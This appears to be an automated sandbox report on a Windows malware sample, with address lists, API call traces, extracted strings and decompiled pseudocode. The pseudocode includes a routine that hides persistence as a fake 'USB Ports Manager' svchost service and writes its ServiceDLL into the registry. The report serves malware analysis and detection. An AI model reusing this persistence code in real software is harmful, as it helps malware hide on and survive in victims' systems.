                                                                                                                        0x6f336ede
                                                                                                                        0x6f336ee2
                                                                                                                        0x6f336ee8
                                                                                                                        0x6f336eeb
                                                                                                                        0x6f336ef0
                                                                                                                        0x6f336ef3
                                                                                                                        0x6f336efe
                                                                                                                        0x6f336f01
                                                                                                                        0x6f336f05
                                                                                                                        0x6f336f09
                                                                                                                        0x6f336f16
                                                                                                                        0x6f336f18
                                                                                                                        0x6f336f1d
                                                                                                                        0x6f336f25
                                                                                                                        0x6f336f29
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f3d
                                                                                                                        0x6f336f4f
                                                                                                                        0x6f336f58
                                                                                                                        0x6f336f5a
                                                                                                                        0x6f336f5f
                                                                                                                        0x6f336f67
                                                                                                                        0x6f336f6c
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f93
                                                                                                                        0x6f336f97
                                                                                                                        0x6f336fa0
                                                                                                                        0x6f336fa2
                                                                                                                        0x6f336fa7
                                                                                                                        0x6f336fb3
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fce
                                                                                                                        0x6f336fd3
                                                                                                                        0x6f336fd7
                                                                                                                        0x6f336fe8
                                                                                                                        0x6f336fea
                                                                                                                        0x6f336ff2
                                                                                                                        0x6f336ffa
                                                                                                                        0x6f337002
                                                                                                                        0x6f33776f
                                                                                                                        0x6f337776
                                                                                                                        0x00000000
                                                                                                                        0x6f337008
                                                                                                                        0x00000000
                                                                                                                        0x6f337014
                                                                                                                        0x6f337018
                                                                                                                        0x6f33703a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701f
                                                                                                                        0x6f337023
                                                                                                                        0x6f33702a
                                                                                                                        0x6f337031
                                                                                                                        0x6f337031
                                                                                                                        0x6f337044
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337059
                                                                                                                        0x6f33706a
                                                                                                                        0x6f33773e
                                                                                                                        0x6f337746
                                                                                                                        0x6f337757
                                                                                                                        0x6f33775f
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337765
                                                                                                                        0x6f337077
                                                                                                                        0x6f337077
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33707f
                                                                                                                        0x6f33708b
                                                                                                                        0x6f337090
                                                                                                                        0x6f33709a
                                                                                                                        0x6f3370ae
                                                                                                                        0x6f3370af
                                                                                                                        0x6f3370b2
                                                                                                                        0x6f3370b3
                                                                                                                        0x6f3370b6
                                                                                                                        0x6f3370bb
                                                                                                                        0x6f3370c0
                                                                                                                        0x6f3370d5
                                                                                                                        0x6f3370d9
                                                                                                                        0x6f3370df
                                                                                                                        0x6f3370e4
                                                                                                                        0x6f337103
                                                                                                                        0x6f33710b
                                                                                                                        0x6f337121
                                                                                                                        0x6f337123
                                                                                                                        0x6f337128
                                                                                                                        0x6f337131
                                                                                                                        0x6f33713f
                                                                                                                        0x6f33713f
                                                                                                                        0x6f337128
                                                                                                                        0x6f337145
                                                                                                                        0x6f337151
                                                                                                                        0x6f337155
                                                                                                                        0x6f337158
                                                                                                                        0x6f33715e
                                                                                                                        0x6f337162
                                                                                                                        0x6f33716c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f337191
                                                                                                                        0x6f33719a
                                                                                                                        0x6f33719c
                                                                                                                        0x6f3371a1
                                                                                                                        0x6f3371b0
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371ce
                                                                                                                        0x6f3371d2
                                                                                                                        0x6f3371da
                                                                                                                        0x6f3371e0
                                                                                                                        0x6f3371ec
                                                                                                                        0x6f3371f0
                                                                                                                        0x6f3371f6
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f337212
                                                                                                                        0x6f337222
                                                                                                                        0x6f337227
                                                                                                                        0x6f33722b
                                                                                                                        0x6f337232
                                                                                                                        0x6f33723d
                                                                                                                        0x6f337246
                                                                                                                        0x6f33724f
                                                                                                                        0x6f337256
                                                                                                                        0x6f33725d
                                                                                                                        0x6f337263
                                                                                                                        0x6f33726f
                                                                                                                        0x6f337270
                                                                                                                        0x6f337271
                                                                                                                        0x6f337272
                                                                                                                        0x6f337279
                                                                                                                        0x6f33728f
                                                                                                                        0x6f337291
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372a2
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f33725d
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f3372c4
                                                                                                                        0x6f3372c6
                                                                                                                        0x6f3372ca
                                                                                                                        0x6f3372ce
                                                                                                                        0x6f3372d2
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f337367
                                                                                                                        0x6f337367
                                                                                                                        0x6f33736b
                                                                                                                        0x6f337376
                                                                                                                        0x6f337378
                                                                                                                        0x6f337386
                                                                                                                        0x6f337390
                                                                                                                        0x6f337396
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373a3
                                                                                                                        0x6f3373a5
                                                                                                                        0x6f3373a9
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373bb
                                                                                                                        0x6f3373bf
                                                                                                                        0x6f3373c6
                                                                                                                        0x6f3373ca
                                                                                                                        0x6f3373ce
                                                                                                                        0x6f3373d2
                                                                                                                        0x6f3373d6
                                                                                                                        0x6f3373d9
                                                                                                                        0x6f3373dc
                                                                                                                        0x6f337412
                                                                                                                        0x6f337412
                                                                                                                        0x6f337416
                                                                                                                        0x00000000
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373e7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3373ec
                                                                                                                        0x6f3373f2
                                                                                                                        0x6f3373f8
                                                                                                                        0x6f3373ff
                                                                                                                        0x6f337409
                                                                                                                        0x6f33740d
                                                                                                                        0x6f337419
                                                                                                                        0x6f33741d
                                                                                                                        0x6f337422
                                                                                                                        0x6f337423
                                                                                                                        0x6f337427
                                                                                                                        0x6f337434
                                                                                                                        0x6f33743b
                                                                                                                        0x6f33743f
                                                                                                                        0x6f337441
                                                                                                                        0x6f337448
                                                                                                                        0x6f337450
                                                                                                                        0x6f337453
                                                                                                                        0x6f337461
                                                                                                                        0x6f337466
                                                                                                                        0x6f33746d
                                                                                                                        0x6f337470
                                                                                                                        0x6f337474
                                                                                                                        0x6f33747a
                                                                                                                        0x6f337487
                                                                                                                        0x6f337491
                                                                                                                        0x6f337496
                                                                                                                        0x6f337496
                                                                                                                        0x6f33749d
                                                                                                                        0x6f3374a2
                                                                                                                        0x6f3374a3
                                                                                                                        0x6f3374ac
                                                                                                                        0x6f3374ae
                                                                                                                        0x6f3374b7
                                                                                                                        0x6f3374bc
                                                                                                                        0x6f3374c6
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d9
                                                                                                                        0x6f3374df
                                                                                                                        0x6f33763f
                                                                                                                        0x6f33763f
                                                                                                                        0x6f337648
                                                                                                                        0x6f337649
                                                                                                                        0x6f337656
                                                                                                                        0x6f33766e
                                                                                                                        0x6f337678
                                                                                                                        0x6f33767c
                                                                                                                        0x6f337680
                                                                                                                        0x6f337685
                                                                                                                        0x6f33768b
                                                                                                                        0x6f337698
                                                                                                                        0x6f33769f
                                                                                                                        0x6f3376a4
                                                                                                                        0x6f3376ac
                                                                                                                        0x6f337706
                                                                                                                        0x6f33770a
                                                                                                                        0x6f33770f
                                                                                                                        0x6f33770f
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376b4
                                                                                                                        0x6f3376b7
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376d6
                                                                                                                        0x6f3376dc
                                                                                                                        0x6f3376e2
                                                                                                                        0x6f3376e6
                                                                                                                        0x6f3376fa
                                                                                                                        0x6f3376fa
                                                                                                                        0x00000000
                                                                                                                        0x6f3374e5
                                                                                                                        0x6f3374e8
                                                                                                                        0x6f3374fd
                                                                                                                        0x6f337502
                                                                                                                        0x6f337507
                                                                                                                        0x6f33750e
                                                                                                                        0x6f337517
                                                                                                                        0x6f33751d
                                                                                                                        0x6f337522
                                                                                                                        0x6f337530
                                                                                                                        0x6f337538
                                                                                                                        0x6f33753f
                                                                                                                        0x6f337544
                                                                                                                        0x6f33754a
                                                                                                                        0x6f33754e
                                                                                                                        0x6f337556
                                                                                                                        0x6f337558
                                                                                                                        0x6f337558
                                                                                                                        0x6f337562
                                                                                                                        0x6f337569
                                                                                                                        0x6f337589
                                                                                                                        0x6f33758a
                                                                                                                        0x6f33758b
                                                                                                                        0x6f33758c
                                                                                                                        0x6f33756b
                                                                                                                        0x6f337573
                                                                                                                        0x6f337576
                                                                                                                        0x6f33757d
                                                                                                                        0x6f337582
                                                                                                                        0x6f337586
                                                                                                                        0x6f337586
                                                                                                                        0x6f33758d
                                                                                                                        0x6f337592
                                                                                                                        0x6f337599
                                                                                                                        0x6f3375bd
                                                                                                                        0x6f3375cd
                                                                                                                        0x6f3375d7
                                                                                                                        0x6f3375dc
                                                                                                                        0x6f3375e1
                                                                                                                        0x6f3375e7
                                                                                                                        0x6f3375f1
                                                                                                                        0x6f33760c
                                                                                                                        0x6f337617
                                                                                                                        0x6f33761d
                                                                                                                        0x6f33761d
                                                                                                                        0x6f337599
                                                                                                                        0x6f337517
                                                                                                                        0x6f33762f
                                                                                                                        0x6f337639
                                                                                                                        0x6f337712
                                                                                                                        0x6f337712
                                                                                                                        0x6f337718
                                                                                                                        0x6f33771a
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337721
                                                                                                                        0x6f337721
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337727
                                                                                                                        0x6f337736
                                                                                                                        0x6f33773c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337639
                                                                                                                        0x6f3374df
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372e4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f1
                                                                                                                        0x6f3372f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f7
                                                                                                                        0x6f3372f9
                                                                                                                        0x6f337300
                                                                                                                        0x6f337300
                                                                                                                        0x6f33730a
                                                                                                                        0x6f337318
                                                                                                                        0x6f337321
                                                                                                                        0x6f337323
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733c
                                                                                                                        0x6f337340
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735d
                                                                                                                        0x6f337361
                                                                                                                        0x6f337361
                                                                                                                        0x6f337365
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337342
                                                                                                                        0x6f337342
                                                                                                                        0x6f337353
                                                                                                                        0x6f337355
                                                                                                                        0x6f337355
                                                                                                                        0x6f337356
                                                                                                                        0x6f337357
                                                                                                                        0x00000000
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732c
                                                                                                                        0x6f33732d
                                                                                                                        0x6f337331
                                                                                                                        0x6f337338
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733a
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f33705b
                                                                                                                        0x00000000
                                                                                                                        0x6f337767
                                                                                                                        0x6f337769
                                                                                                                        0x00000000
                                                                                                                        0x6f337769
                                                                                                                        0x6f337002

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D67
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 6F336D7B
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D95
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6F336DAB
                                                                                                                        • CharLowerW.USER32(?), ref: 6F336DB9
                                                                                                                        • RtlZeroMemory.NTDLL(6F3403A0,0000009C), ref: 6F336DC9
                                                                                                                        • RtlGetNtVersionNumbers.NTDLL ref: 6F336DF3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000034), ref: 6F336E8A
                                                                                                                        • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6F336F29
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6F336F30
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F37
                                                                                                                        • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6F336F6C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6F336F73
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F7A
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 6F336FB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6F336FBA
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6F336FC1
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 6F336FD7
                                                                                                                        • GetMessageA.USER32 ref: 6F336FFA
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 6F33707F
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 6F3370B6
                                                                                                                        • wsprintfW.USER32 ref: 6F3370D9
                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 6F337103
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F337131
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6F337138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6F33713F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
                                                                                                                        • String ID: %lu$%s\%s$($PWD$gd$gd
                                                                                                                        • API String ID: 2388189746-3190195910
                                                                                                                        • Opcode ID: 0b68b10d120f802ab20bd4934a8cb918c4ac15ffe956dabc858ce338e369b40d
                                                                                                                        • Instruction ID: 3f8193a05892ecb1d658e38f96214ad2619d243b80bf7ca49f5b8d62d593e374
                                                                                                                        • Opcode Fuzzy Hash: 0b68b10d120f802ab20bd4934a8cb918c4ac15ffe956dabc858ce338e369b40d
                                                                                                                        • Instruction Fuzzy Hash: 16529DB2908385AFD720DF64C884EABBBEDFB89714F00891DF58587241D775E858CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FB7F9, Relevance: 107.7, APIs: 35, Strings: 26, Instructions: 957networkfilesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004FB815
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB833
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB849
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB86E
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004FB87A
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB898
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB917
                                                                                                                        • __itoa.LIBCMT ref: 004FB984
                                                                                                                        • HttpOpenRequestA.WININET(?,?,?,00000000,00000000,?,84400000,00000000), ref: 004FBA69
                                                                                                                        • GetLastError.KERNEL32(00000001,00000000,00000001,00000000), ref: 004FBAA1
                                                                                                                        • HttpAddRequestHeadersA.WININET(?,Content-Type: application/octet-streamContent-Transfer-Encoding: binary,000000FF,A0000000), ref: 004FBC0C
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FBC2D
                                                                                                                        • HttpSendRequestExA.WININET(?,00000028,00000000,00000000,00000000), ref: 004FBC46
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBC54
                                                                                                                        • InternetWriteFile.WININET(?,?,?,?), ref: 004FBD84
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBD9F
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 004FBE9D
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBEA7
                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,00000000,?,?), ref: 004FBEFC
                                                                                                                        • _memset.LIBCMT ref: 004FBF1E
                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,?), ref: 004FBF39
                                                                                                                        • _strncmp.LIBCMT ref: 004FBF52
                                                                                                                        • _strncmp.LIBCMT ref: 004FBF6D
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC00D
                                                                                                                        • HttpQueryInfoA.WININET(?,00000005,00000000,?,?), ref: 004FC0A0
                                                                                                                        • _memset.LIBCMT ref: 004FC0C2
                                                                                                                        • HttpQueryInfoA.WININET(?,00000005,?,?,?), ref: 004FC0DD
                                                                                                                        • _strncmp.LIBCMT ref: 004FC0F6
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC196
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 004FC230
                                                                                                                        • _memset.LIBCMT ref: 004FC24E
                                                                                                                        • InternetReadFile.WININET(?,?,?,?), ref: 004FC266
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC2B0
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FC3F3
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FC5EC
                                                                                                                        Strings
                                                                                                                        • NC.WriteHttp: Retry limit reached, xrefs: 004FC3CD, 004FC479
                                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binary, xrefs: 004FBC06
                                                                                                                        • NC.WriteHttp.Timeout, xrefs: 004FB8AD
                                                                                                                        • &data=, xrefs: 004FB9F3
                                                                                                                        • 204, xrefs: 004FBF65
                                                                                                                        • writeDataHttp.SendRequestEx., xrefs: 004FBC5E
                                                                                                                        • NC.WriteHttp.Resend, xrefs: 004FC442
                                                                                                                        • NC.WriteHttp: HTTP response content length is , xrefs: 004FC116
                                                                                                                        • POST, xrefs: 004FBA30
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response content length, last error = , xrefs: 004FC1AD
                                                                                                                        • &client=DynGate, xrefs: 004FB9A5
                                                                                                                        • NC.WriteHttp: HTTP response status code = , xrefs: 004FBF8D
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response body, last error = , xrefs: 004FC2C7
                                                                                                                        • NC.WriteHttp.PostBlockTimeout, xrefs: 004FC389
                                                                                                                        • */*, xrefs: 004FB941
                                                                                                                        • NC.WriteHttp: Setting LimitForGetInsteadPost to 0, xrefs: 004FC354
                                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binaryX-Connection: close, xrefs: 004FBBFF
                                                                                                                        • NC.WriteHttp.Failed1 EC=, xrefs: 004FBB19
                                                                                                                        • 200, xrefs: 004FBF4A
                                                                                                                        • &p=, xrefs: 004FB98C
                                                                                                                        • NC.WriteHttp.Failed2 EC=, xrefs: 004FBCCC
                                                                                                                        • NC.WriteHttp.Failed3 EC=, xrefs: 004FBDA9
                                                                                                                        • writeDatahttp.OpenRequest, xrefs: 004FBAAB
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response status code, last error = , xrefs: 004FC024
                                                                                                                        • /dout.aspx?s=, xrefs: 004FB957
                                                                                                                        • GET, xrefs: 004FBA0F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CountHttpTick$ErrorLast$Query$H_prolog3InfoRequest$CriticalInternetSection_memset_strncmp$FileInitialize$AvailableDataDeleteH_prolog3_H_prolog3_catchHeadersOpenReadSendSleepWrite__itoa_swprintf
                                                                                                                        • String ID: NC.WriteHttp.Failed1 EC=$ NC.WriteHttp.Failed2 EC=$ NC.WriteHttp.Failed3 EC=$ NC.WriteHttp.PostBlockTimeout$ NC.WriteHttp.Resend$ NC.WriteHttp.Timeout$ NC.WriteHttp: HTTP response content length is $ NC.WriteHttp: HTTP response status code = $ NC.WriteHttp: Retry limit reached$ NC.WriteHttp: Setting LimitForGetInsteadPost to 0$ NC.WriteHttp: unable to retrieve HTTP response body, last error = $ NC.WriteHttp: unable to retrieve HTTP response content length, last error = $ NC.WriteHttp: unable to retrieve HTTP response status code, last error = $&client=DynGate$&data=$&p=$*/*$/dout.aspx?s=$200$204$Content-Type: application/octet-streamContent-Transfer-Encoding: binary$Content-Type: application/octet-streamContent-Transfer-Encoding: binaryX-Connection: close$GET$POST$writeDataHttp.SendRequestEx.$writeDatahttp.OpenRequest
                                                                                                                        • API String ID: 2873065635-871557215
                                                                                                                        • Opcode ID: 526348b2dadebddfb0bb1e0d46d1751e5f45128b7d4687acb9c95c9ec499ebc6
                                                                                                                        • Instruction ID: 27af62c4672615e0fc1e2df86297175aa6cb2596e6136e4c056b301bfd405319
                                                                                                                        • Opcode Fuzzy Hash: 526348b2dadebddfb0bb1e0d46d1751e5f45128b7d4687acb9c95c9ec499ebc6
                                                                                                                        • Instruction Fuzzy Hash: 1C82BE70C0428CEFEF21EBA4CD85AEEBBB8AF15304F14409EE54667291DB781E48DB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333C60, Relevance: 98.4, APIs: 40, Strings: 16, Instructions: 398registrystringserviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F333C60() {
				char _v760;
				char _v772;
				char _v780;
				char _v1016;
				char _v1024;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				int _v1056;
				intOrPtr _v1060;
				int _v1064;
				intOrPtr _v1068;
				int _v1072;
				int* _v1076;
				char _v1080;
				char* _v1084;
				char* _v1088;
				void* _v1092;
				void* _v1096;
				char _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				int _v1116;
				void* _v1120;
				char* _v1124;
				void* _v1128;
				intOrPtr _v1132;
				char _v1140;
				void* _t80;
				long _t84;
				void** _t85;
				long _t93;
				char* _t99;
				int _t100;
				intOrPtr _t104;
				long _t107;
				intOrPtr _t108;
				long _t111;
				long _t114;
				long _t117;
				char* _t125;
				void* _t145;
				long _t151;
				char* _t173;
				CHAR* _t174;
				long _t182;
				char** _t196;
				char** _t199;
				char** _t200;
				char** _t201;
				char** _t202;
				char** _t203;
				intOrPtr _t207;
				intOrPtr _t220;

				_t196 =  &_v1124;
				_v1112 = 0;
				_t80 = OpenSCManagerA(0, 0, 0xf003f);
				_v1108 = _t80;
				if(_t80 != 0) {
					L2:
					_v1124 = 0;
					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
					if(_t145 != 0) {
						L14:
						_v1112 = 1;
						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
						_t84 = RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0); // executed
						if(_t84 == 0) {
							_push(0x105);
							_push( &_v1036);
							L6F33C2EE();
							_v1120 = 0x105;
							_v1116 = 2;
							_t93 = RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120); // executed
							if(_t93 != 0) {
								L17:
								_t151 = M6F34052C; // 0x33
								_t173 = M6F340524; // 0xa56118
								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
							} else {
								_t174 = M6F340524; // 0xa56118
								if(lstrcmpiA( &_v1044, _t174) != 0) {
									goto L17;
								}
							}
							RegCloseKey(_v1124);
						}
						L6F33C2EE();
						_t85 =  &_v1104;
						_v1104 = 0;
						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
						if(_t85 == 0 || _v1096 != 4) {
							_t220 = M6F340544; // 0x1
							if(_t220 == 0) {
								_push(0);
								_push(0);
							} else {
								_push(1);
								_v1140 = "s";
								_push( &_v1140);
							}
							_push(_t145);
							E6F3337D0();
						}
						CloseServiceHandle(_t145);
					} else {
						_t207 = M6F340544; // 0x1
						if(_t207 != 0) {
							_t99 = M6F34053C; // 0xa32c55
							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
							_t199 =  &(_t196[5]);
							_v1112 = _t100;
							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
							if(_t145 != 0) {
								_v1072 = 1;
								_v1064 = 1;
								_v1056 = 1;
								_v1068 = 0x1388;
								_v1060 = 0x1388;
								_v1052 = 0x1388;
								_v1092 = 0;
								_v1084 = 0;
								_v1088 = 0;
								_v1080 = 3;
								_v1076 =  &_v1072;
								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
								_t104 =  *0x6f34047c; // 0xa545e0
								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6f33d543);
								_t200 =  &(_t199[6]);
								_t107 = RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0); // executed
								if(_t107 == 0) {
									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager")); // executed
									RegCloseKey(_v1120);
								}
								_t108 =  *0x6f34047c; // 0xa545e0
								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
